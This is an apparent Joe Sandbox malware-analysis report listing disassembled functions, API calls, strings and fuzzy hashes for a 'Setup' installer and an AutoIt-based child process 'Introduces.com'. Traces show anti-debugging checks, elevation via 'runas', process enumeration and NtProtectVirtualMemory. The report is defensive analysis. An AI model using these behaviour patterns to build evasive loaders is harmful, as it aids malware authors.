Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Introduces.comPID: 3452, Parent PID: 6600COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	109

Executed Functions

Function 00A05240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A0526C
IsDebuggerPresent.KERNEL32 ref: 00A0527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A052E6

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

Part of subcall function 009FBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009FBC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00A05366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00A40B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00A40B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AA6D10), ref: 00A40BE9
ShellExecuteW.SHELL32(00000000), ref: 00A40BF0

Part of subcall function 00A0514C: GetSysColorBrush.USER32(0000000F), ref: 00A05156
Part of subcall function 00A0514C: LoadCursorW.USER32(00000000,00007F00), ref: 00A05165
Part of subcall function 00A0514C: LoadIconW.USER32(00000063), ref: 00A0517C
Part of subcall function 00A0514C: LoadIconW.USER32(000000A4), ref: 00A0518E
Part of subcall function 00A0514C: LoadIconW.USER32(000000A2), ref: 00A051A0
Part of subcall function 00A0514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A051C6
Part of subcall function 00A0514C: RegisterClassExW.USER32(?), ref: 00A0521C

Part of subcall function 00A050DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A05109
Part of subcall function 00A050DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A0512A
Part of subcall function 00A050DB: ShowWindow.USER32(00000000), ref: 00A0513E
Part of subcall function 00A050DB: ShowWindow.USER32(00000000), ref: 00A05147

Part of subcall function 00A059D3: _memset.LIBCMT ref: 00A059F9
Part of subcall function 00A059D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A05A9E

Strings

runas, xrefs: 00A40BE4
AutoIt, xrefs: 00A40B23
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00A40B28

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: f60a23e7a44e634cec33627f95eb4ad098d53de17d5a05034a51be421006e60a
Instruction ID: 4b28d2aa17a96ce626fe4b35f702a1dbae865829f2e3d31ce828ae5103013457
Opcode Fuzzy Hash: f60a23e7a44e634cec33627f95eb4ad098d53de17d5a05034a51be421006e60a
Instruction Fuzzy Hash: 9351F031D0824CAACF01EBF4ED56EEE7B78AF99380F104165F551661E3DAB0094ADB21

Function 00A05D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00A05D40

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

GetCurrentProcess.KERNEL32(?,00A80A18,00000000,00000000,?), ref: 00A05E07
IsWow64Process.KERNEL32(00000000), ref: 00A05E0E
GetNativeSystemInfo.KERNEL32(00000000), ref: 00A05E54
FreeLibrary.KERNEL32(00000000), ref: 00A05E5F
GetSystemInfo.KERNEL32(00000000), ref: 00A05E90
GetSystemInfo.KERNEL32(00000000), ref: 00A05E9C

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 6ec07a5c14f14ea4ab4e55e7020561627457f6618b2d1fad5db874d2636693d4
Instruction ID: dcf9d53f2ec3836c94a6e2cff5057afeaadbeac4273bba3cfe4d27319cbbe300
Opcode Fuzzy Hash: 6ec07a5c14f14ea4ab4e55e7020561627457f6618b2d1fad5db874d2636693d4
Instruction Fuzzy Hash: F891D531949BC8DEC731CB7894545ABFFF56F79300B880A5ED0C793A81D230A688DB59

Function 00A54005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A02A58,?,00008000), ref: 00A102A4

Part of subcall function 00A54FEC: GetFileAttributesW.KERNEL32(?,00A53BFE), ref: 00A54FED

FindFirstFileW.KERNEL32(?,?), ref: 00A5407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 00A540CC
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A540DD
FindClose.KERNEL32(00000000), ref: 00A540F4
FindClose.KERNEL32(00000000), ref: 00A540FD

Strings

\*.*, xrefs: 00A5404E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: f142a1603f20b92b1388c095ae25255750eb156c14d9370223c63fcda1d918b0
Instruction ID: 1500821a9a45edb39e88914cc1d24491cad1fee52398935974205a8a4ee4e885
Opcode Fuzzy Hash: f142a1603f20b92b1388c095ae25255750eb156c14d9370223c63fcda1d918b0
Instruction Fuzzy Hash: 5331A231008349ABC301EBA0D995CEFB7E8BE95315F400A2DF9D1821D2EB34D94DC762

Function 00A54148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A5416D
Process32FirstW.KERNEL32(00000000,?), ref: 00A5417B
Process32NextW.KERNEL32(00000000,?), ref: 00A5419B
CloseHandle.KERNEL32(00000000), ref: 00A54245

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 47ad4c612279283a550bbce07684e407892bdd86c6b52d79878adc57c09bbb66
Instruction ID: da994a7415d437ad9a43ed1d4ec9508caf7f2a8dde623728aa9ddc999a310069
Opcode Fuzzy Hash: 47ad4c612279283a550bbce07684e407892bdd86c6b52d79878adc57c09bbb66
Instruction Fuzzy Hash: 0931A4711083459FD300EF50E885AEFBBE8BF99355F40052DF585C21E1EB709989CB52

Function 009FB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00A03740: CharUpperBuffW.USER32(?,00AB71DC,00000000,?,00000000,00AB71DC,?,009F53A5,?,?,?,?), ref: 00A0375D

_memmove.LIBCMT ref: 009FB68A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: c7f60f04ab041896225c1cfeddecba0a607cb4412a2c6bfd3295857e30517aff
Instruction ID: 47c453c7b50c4349ca17f68e3434346ed082be275fe90b4ce1fd9b0107c001ea
Opcode Fuzzy Hash: c7f60f04ab041896225c1cfeddecba0a607cb4412a2c6bfd3295857e30517aff
Instruction Fuzzy Hash: 8CA287716083459FCB20DF18C480B6AB7E5BF88304F14896DFA9A8B361D775ED85CB92

Function 009F94E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8704fa594489f1f6ec39e0a69d645035fb494b2cdb7e15a12792a4b36d9392
Instruction ID: 2573eed07c157f603f17931d2f3d07b2d871293111f182d95f1fdd3dc43770ba
Opcode Fuzzy Hash: 2a8704fa594489f1f6ec39e0a69d645035fb494b2cdb7e15a12792a4b36d9392
Instruction Fuzzy Hash: A922AA74E0420ACFDB24DF58C880BBEB7B4FF49300F148569EA56AB351E774A985CB91

Function 00A10E38 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00A10ED5
NtProtectVirtualMemory.NTDLL ref: 00A10EE7

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CloseHandleMemoryProtectVirtual
String ID:
API String ID: 2407445808-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: f9b47937d168e1576482ed54476d5231ba883fe5c46c86502cb6f2a4416ec99a
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9F31C571A00109DFD718DF59C5809A9FBB6FF59300B648AA5E409CB291E7B1EDC1CBC0

Function 009FBC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 009FBF57

Part of subcall function 009F52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F52E6

Sleep.KERNEL32(0000000A,?,?), ref: 00A336B5

Strings

@GUI_CTRLHANDLE, xrefs: 00A33816
CALL, xrefs: 009FC277
@COM_EVENTOBJ, xrefs: 00A33D2E
@GUI_WINHANDLE, xrefs: 00A337C1
@GUI_CTRLID, xrefs: 00A3376C
@TRAY_ID, xrefs: 00A33FCD

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: 971ae54a2bd6faa523b3e247b49dd9d769a842c2d5f93c621b42cb3e579aacba
Instruction ID: 527d558149e7d64115622e778dcd275995885fe9074aa394f45f2451d83bb451
Opcode Fuzzy Hash: 971ae54a2bd6faa523b3e247b49dd9d769a842c2d5f93c621b42cb3e579aacba
Instruction Fuzzy Hash: DDC2C170608345DFDB28DF24C984BAAB7E4FF84304F14891DF69A972A1CB75E985CB42

Function 009F33E8 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 67windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 009F3444
RegisterClassExW.USER32(00000030), ref: 009F346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009F347F
InitCommonControlsEx.COMCTL32(?), ref: 009F349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009F34AC
LoadIconW.USER32(000000A9), ref: 009F34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009F34D1

Strings

TaskbarCreated, xrefs: 009F3474
AutoIt v3 GUI, xrefs: 009F3460
0, xrefs: 009F3426
+, xrefs: 009F342D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
